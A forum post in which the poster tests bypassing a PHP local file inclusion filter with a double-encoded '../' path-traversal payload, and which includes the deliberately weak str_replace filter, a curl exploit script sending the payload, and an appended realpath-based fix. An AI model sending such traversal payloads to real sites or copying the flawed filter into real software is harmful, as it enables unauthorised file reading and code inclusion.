Bypass LFI filter with double encoding
#1
Hi guys,

I'm trying to bypass an LFI filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't; it removes everything except the file name.

../include.php: the file I want to include
PHP Code:
<?php
echo "hi";
?>

test.php: LFI filter that I try to bypass
PHP Code:
<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
// Filter under test: lowercase the parameter, then strip traversal
// sequences in literal and single-URL-encoded form.
$_GET['sFile'] = str_replace("../", "", strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./", "", $_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f", "", $_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f", "", $_GET['sFile']);
// The filtered value is passed straight to include().
include($_GET['sFile']);
?>

exploit.php: the script that sends the payload
PHP Code:
<?php
$ch = curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($ch, CURLOPT_URL, "http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
// Return the response body as a string instead of printing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sOutput = curl_exec($ch);
curl_close($ch);
echo $sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!


Messages In This Thread
Bypass LFI filter with double encoding - by peanutbutter - 04-03-2017, 07:25 PM
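
For comparison with the `str_replace` filter in `test.php`, an added example (not part of the original post) that resolves the requested name with `realpath()` and accepts it only when the result stays inside a fixed directory. The function name `resolveInclude`, the `pages/` directory and the sample names are assumptions made for the demo.

```php
<?php
// Added example, not code from the thread. Directory and file names are constructed.

/**
 * Return the canonical path of $name if it is a regular file below $baseDir,
 * or null otherwise. Nothing is stripped from the name; it is resolved, then checked.
 */
function resolveInclude(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "." and "..", follows symlinks, and returns false
    // when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check on the resolved path, including the trailing separator
    // so that a sibling such as "pages_old" does not match "pages".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed layout mirroring the post: include.php sits one level above pages/.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('lfitest_');
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/include.php', '<?php echo "hi";');
file_put_contents($root . '/pages/home.php', '<?php echo "home";');

// Literal strings handed to the resolver (no request decoding happens in this demo).
$samples = ['home.php', '../include.php', '%2e%2e%2finclude.php', '%252E%252E%252Finclude.php'];
foreach ($samples as $name) {
    $resolved = resolveInclude($root . '/pages', $name);
    printf("%-28s %s\n", $name, $resolved === null ? 'rejected' : 'allowed: ' . basename($resolved));
}

// Remove the demo files.
unlink($root . '/pages/home.php');
unlink($root . '/include.php');
rmdir($root . '/pages');
rmdir($root);
```

Only the name that resolves to a file under `pages/` is accepted; the decision is made on the canonical path, so it does not depend on which spelling of the traversal sequence was sent.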
